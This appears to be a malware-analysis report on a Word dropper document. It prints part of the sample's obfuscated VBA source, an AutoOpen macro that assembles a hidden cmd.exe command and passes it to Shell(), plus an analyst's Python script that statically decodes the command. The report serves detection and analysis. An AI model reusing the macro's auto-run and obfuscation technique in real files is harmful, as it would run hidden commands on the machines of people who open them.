Verdict: MALICIOUS (Risk Score 202)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)
The sample is a malicious Word document carrying VBA macros. Its AutoOpen macro runs as soon as the document is opened and ends in a VBA.Shell() call, which is the critical finding. ClamAV identifies the file as Doc.Dropper.Valyria-6666918-0, a dropper family. The Shell() argument is never present as a plain string: it is assembled at run time from dozens of short string fragments and Chr() calls spread across helper functions, padded with no-op TypeName statements so that the decisive lines are hard to spot. The fragments that are visible in the preview spell out `md /V /C "set ...` followed by `for %C in ( 63 ,32 , 27 ...`, i.e. a cmd.exe invocation with delayed variable expansion that stores an alphabet string in an environment variable and then picks characters out of it by index inside a for loop. That is the usual second obfuscation layer in front of a download-and-execute command, so a secondary payload is the likely outcome; the preview is cut off before the index list ends, so the final command and any network indicator cannot be recovered from this report alone.
Heuristics (6)

- ClamAV: Doc.Dropper.Valyria-6666918-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Valyria-6666918-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that every Office file references, not a network indicator for this sample.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26922 bytes | 5adde04dcb38dca0be0ee84b7de81c1fe712a7efd5c8b336b18185b64f3d73cc |
Preview (first 1,000 lines of the extracted script; the preview stops where marked below):

```vba
Attribute VB_Name = "OmoMQRWfuf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CStr(mFQPq / nsAFk * 64898 + iiEnm)
TypeName CLng(wwWpTZ)
TypeName Int(udQoj / kizjB)
TypeName 5937
TypeName 303
TypeName CDbl(71114 + OUREb)
VBA.Shell# KeyString(RALlaOrZSCpVQ + biWfFsTEztJmH + vbKeyC + NvRCLPcvtW + NwuSimhNkDi) + zvLrRbjKwpuDNz + ncJOSFFFbazaBk + falHjwul + OuZZdNNq + LnVCn + ljsHIsKHR + LNzmAdu + GwtqTZLtTv + UClrdBdrK + tFpib + NmGinE + sKkuIpnFqC + IlZiOizKKkQ + mLrquNCUiHi + rCVWhVtKLp + DZvRSjKuhX + GivVFWG + twBbWcQYM + XUnHaXScvO + JAPUpHOwb + hrpGQrcIJ, 994506110 - 994506110
TypeName Tan(hSKjFh)
TypeName OHCqw
End Sub
Attribute VB_Name = "FJTmninS"
Function falHjwul()
On Error Resume Next
TypeName CSng(28529 / clnbd)
TypeName Sqr(2032)
TypeName CDate(482835542)
ERECIaAIMj = "md" + " /" + "V " + " " + " /" + CStr(Chr(bLkOrzTo + fjIKFoKTWcUnq + 67 + qEtzDLAzF + wCDpNYFiKwQz)) + " " + " " + CStr(Chr(lkvSsnVlu + ZpchijCHUsHPh + 34 + hLnWaHfjSaFjMP + HDwnjdwj)) + "s" + "et" + " " + " " + " " + " a"
TypeName Round(58345 + hEIFv)
TypeName 9462
TypeName Log(EWWcmO)
hJWnQApPCbz = "m" + CStr(Chr(qtWiVODzG + YZluFKHYAprEiz + 99 + bMEPHGMQmNnE + PJFMjiLtdSp)) + "S=M" + "jI" + "MT" + "vS" + "s" + "U" + "G" + "Xs" + "usG"
TypeName briLLM
TypeName Rnd(taCwZ)
TypeName 110005226
ImWJrrCfDS = "z" + CStr(Chr(YzooiKdbk + qRMUHsWChXZizW + 108 + ZijmaAroRzZJ + BfHKVSSql)) + "Zqa" + "O" + "Ux" + "g,A" + "{" + "w.D" + "$N" + "o" + "8=6" + "i\f" + "m:"
TypeName ChrW(zKQWp / 7399)
TypeName GwOqJV
cLNwzAOBo = ")/" + CStr(Chr(mZrwQpSOdDtBPU + XDKTNITWua + 67 + zOjwwqn + qAIHuQKHdsqisu)) + CStr(Chr(RidGVDqARRP + DZjQahCBMTsJOR + 99 + WEUwVjIKUimKHq + pLZSKOS)) + "4" + "+7" + "P@b" + "hkH"
TypeName Log(GWDRj)
TypeName 216
TypeName NOpaKK
zRcCpFMvisW = "W}" + "e" + "J" + "rF5" + "-Y" + "p" + ";yn" + " " + "0"
TypeName 8
TypeName OPcFN
TypeName Fix(71)
tqBGDlOSNE = "d9" + "'" + "t(" + "&&" + " " + " " + "for" + " " + " %" + CStr(Chr(ZFPlwGmHCuMu + XRWvwurtWqr + 67 + rPnImHM + sZXXACFvQGS)) + " " + "i"
TypeName Oct(LwmLw)
TypeName lCzZtO
TypeName wLSqP
qzqTP = "n" + " ( " + " " + "63" + " ," + "32 " + " ," + " 2" + "7" + " " + ", 5" + "6, "
falHjwul = ERECIaAIMj + hJWnQApPCbz + ImWJrrCfDS + cLNwzAOBo + zRcCpFMvisW + tqBGDlOSNE + qzqTP
TypeName ChrB(339510554)
TypeName ChrW(4)
TypeName Oct(japlSl)
End Function
Function OuZZdNNq()
On Error Resume Next
TypeName Ttnjo
TypeName dZFna
TypeName Uzrzj
XWLHYziTMj = " " + " 58" + " " + " ," + " " + " 13" + " ," + "5" + "1 " + " " + ", 5" + "6 " + " ,"
TypeName SlPZQw
TypeName ChrW(FAcfs * 28621 - 37996 + duKWBi)
TypeName ChrB(204570215)
MKCWwsYG = "16" + " " + " " + ", " + " " + "1" + "6 " + "," + " 6" + "7"
TypeName CInt(pMDof)
TypeName 679
TypeName Atn(3036)
TQXsquHTcP = " " + ",3" + "0 " + ", " + " 1" + "7" + ","
TypeName Oct(ROwXu)
TypeName 3
TypeName sjGkkK
iaqkvMhPVB = "66 " + ", 4" + "4" + " " + " ," + " 34" + "," + " "
TypeName CInt(MGQDU)
TypeName Chr(31)
TypeName HNmVZD
UKGLiH = " " + " 6" + "6," + "5" + "6 " + " ," + " " + " "
TypeName CStr(CWiXP + UqOzk + 8728 + 3267)
TypeName Sqr(rZkKzw)
TypeName Hex(3554)
HbqdSZLcIu = " " + "27" + " " + " , " + " " + " 61"
OuZZdNNq = XWLHYziTMj + MKCWwsYG + TQXsquHTcP + iaqkvMhPVB + UKGLiH + HbqdSZLcIu
TypeName hWMTc
TypeName zifRi
TypeName CDbl(21)
End Function
Function LnVCn()
On Error Resume Next
TypeName NGULCL
TypeName CLng(MRDGNG)
TypeName Hex(37)
wPGofZwN = " ," + " " + " " + "3" + "2 "
TypeName irIWl
TypeName CBool(75869 + DjGRJc * 84949 - mqasN)
wWuTPu = " ," + " " + "50" + ", " + " " + " " + " "
TypeName Log(245649738)
TypeName wtMkc
TypeName 112
DssWCw =
```

... (truncated)
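The Shell() argument above can be recovered without running the macro, because the only things that contribute to it are string literals, Chr() calls on arithmetic over undeclared names, and the concatenation order in the `falHjwul = ...`, `OuZZdNNq = ...` and `VBA.Shell# ...` lines. The script below is an added analyst example, not analyzer output and not part of the sample: it replays those assignments from the preview (the `TypeName` filler lines are dropped, since they evaluate an expression and discard it), then applies the same index-into-alphabet decoding that the resulting `cmd /V /C "set ...&& for %C in (...)` command performs, which is how the second layer turns into readable text. Three points are assumptions rather than page facts and are marked as such in the code: undeclared VBA names are Empty (0 in arithmetic, empty in concatenation, which holds with no Option Explicit), Word's Application.KeyString(vbKeyC) yields the single character "c", and the names the preview never defines (zvLrRbjKwpuDNz, ncJOSFFFbazaBk, LnVCn onward) contribute nothing. The function names `recover_shell_command` and `decode_cmd_stage` are mine.

```python
"""Statically recover the Shell() command that the AutoOpen macro builds.

Added analyst example; not output of the analyzer and not code from the
sample. Each assumption is marked ASSUMPTION below.
"""
import re

# Assignment lines copied from the macro preview: the Shell line from
# AutoOpen, falHjwul and OuZZdNNq in full. TypeName filler is omitted (no
# side effects). LnVCn is cut off in the preview, so it stays unresolved.
MACRO = r'''
VBA.Shell# KeyString(RALlaOrZSCpVQ + biWfFsTEztJmH + vbKeyC + NvRCLPcvtW + NwuSimhNkDi) + zvLrRbjKwpuDNz + ncJOSFFFbazaBk + falHjwul + OuZZdNNq + LnVCn + ljsHIsKHR + LNzmAdu + GwtqTZLtTv + UClrdBdrK + tFpib + NmGinE + sKkuIpnFqC + IlZiOizKKkQ + mLrquNCUiHi + rCVWhVtKLp + DZvRSjKuhX + GivVFWG + twBbWcQYM + XUnHaXScvO + JAPUpHOwb + hrpGQrcIJ, 994506110 - 994506110
ERECIaAIMj = "md" + " /" + "V " + " " + " /" + CStr(Chr(bLkOrzTo + fjIKFoKTWcUnq + 67 + qEtzDLAzF + wCDpNYFiKwQz)) + " " + " " + CStr(Chr(lkvSsnVlu + ZpchijCHUsHPh + 34 + hLnWaHfjSaFjMP + HDwnjdwj)) + "s" + "et" + " " + " " + " " + " a"
hJWnQApPCbz = "m" + CStr(Chr(qtWiVODzG + YZluFKHYAprEiz + 99 + bMEPHGMQmNnE + PJFMjiLtdSp)) + "S=M" + "jI" + "MT" + "vS" + "s" + "U" + "G" + "Xs" + "usG"
ImWJrrCfDS = "z" + CStr(Chr(YzooiKdbk + qRMUHsWChXZizW + 108 + ZijmaAroRzZJ + BfHKVSSql)) + "Zqa" + "O" + "Ux" + "g,A" + "{" + "w.D" + "$N" + "o" + "8=6" + "i\f" + "m:"
cLNwzAOBo = ")/" + CStr(Chr(mZrwQpSOdDtBPU + XDKTNITWua + 67 + zOjwwqn + qAIHuQKHdsqisu)) + CStr(Chr(RidGVDqARRP + DZjQahCBMTsJOR + 99 + WEUwVjIKUimKHq + pLZSKOS)) + "4" + "+7" + "P@b" + "hkH"
zRcCpFMvisW = "W}" + "e" + "J" + "rF5" + "-Y" + "p" + ";yn" + " " + "0"
tqBGDlOSNE = "d9" + "'" + "t(" + "&&" + " " + " " + "for" + " " + " %" + CStr(Chr(ZFPlwGmHCuMu + XRWvwurtWqr + 67 + rPnImHM + sZXXACFvQGS)) + " " + "i"
qzqTP = "n" + " ( " + " " + "63" + " ," + "32 " + " ," + " 2" + "7" + " " + ", 5" + "6, "
falHjwul = ERECIaAIMj + hJWnQApPCbz + ImWJrrCfDS + cLNwzAOBo + zRcCpFMvisW + tqBGDlOSNE + qzqTP
XWLHYziTMj = " " + " 58" + " " + " ," + " " + " 13" + " ," + "5" + "1 " + " " + ", 5" + "6 " + " ,"
MKCWwsYG = "16" + " " + " " + ", " + " " + "1" + "6 " + "," + " 6" + "7"
TQXsquHTcP = " " + ",3" + "0 " + ", " + " 1" + "7" + ","
iaqkvMhPVB = "66 " + ", 4" + "4" + " " + " ," + " 34" + "," + " "
UKGLiH = " " + " 6" + "6," + "5" + "6 " + " ," + " " + " "
HbqdSZLcIu = " " + "27" + " " + " , " + " " + " 61"
OuZZdNNq = XWLHYziTMj + MKCWwsYG + TQXsquHTcP + iaqkvMhPVB + UKGLiH + HbqdSZLcIu
'''


def split_plus(expr):
    """Split a VBA expression on '+' that sits outside quotes and parentheses."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch == '+' and depth == 0:
                parts.append(''.join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def eval_term(tok, env):
    """Evaluate one concatenation operand the way VBA does without Option Explicit."""
    if tok.startswith('"'):
        return tok[1:-1]                       # string literal (no doubled quotes in this sample)
    m = re.fullmatch(r'CStr\(Chr\((.*)\)\)', tok)
    if m:
        # ASSUMPTION: the unknown names are undeclared, i.e. Empty, which is 0 in
        # arithmetic, so only the integer literal reaches Chr().
        return chr(sum(int(t) if t.strip().isdigit() else 0 for t in m.group(1).split('+')))
    if tok.startswith('KeyString('):
        return 'c'                             # ASSUMPTION: Word's KeyString(vbKeyC) -> "c"
    return env.get(tok, '')                    # ASSUMPTION: never-assigned name -> Empty -> ""


ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(\S.*)$')
SHELL = re.compile(r'Shell#?\s+(.+?),\s*[-\d\s]+$')   # trailing argument is the window style


def recover_shell_command(macro_text):
    """Replay every string assignment in order, then evaluate the Shell() argument."""
    env, shell_expr = {}, None
    for line in macro_text.splitlines():
        m = SHELL.search(line)
        if m:
            shell_expr = m.group(1)            # evaluated last: helpers are defined below it
            continue
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = ''.join(eval_term(t, env) for t in split_plus(m.group(2)))
    return ''.join(eval_term(t, env) for t in split_plus(shell_expr))


def decode_cmd_stage(cmd):
    """Second layer: `set V=<alphabet>&& for %C in (i1,i2,...)` emits alphabet[i]
    per index (the !V:~%C,1! substring idiom). Returns as much as the preview holds."""
    alphabet = re.search(r'set\s+\w+=(.*?)&&', cmd).group(1)
    raw = re.search(r'for\s+%\w\s+in\s*\(([\d\s,]*)', cmd).group(1)
    return ''.join(alphabet[int(t)] for t in raw.split(',') if t.strip())


if __name__ == '__main__':
    recovered = recover_shell_command(MACRO)
    print(recovered)
    print(decode_cmd_stage(recovered))
```

Run as-is, the first print shows the reassembled `cmd /V /C "set amcS=...&& for %C in ( 63 ,32 , 27 ...` line, and the second shows the 20 indices that survive the truncated preview resolving to the start of a PowerShell command line; the remaining indices, and therefore the download URL, are in the part of LnVCn and later functions that the preview does not include. The same replay approach works for any macro of this family as long as the string assignments themselves are visible, since the junk statements never feed into the result.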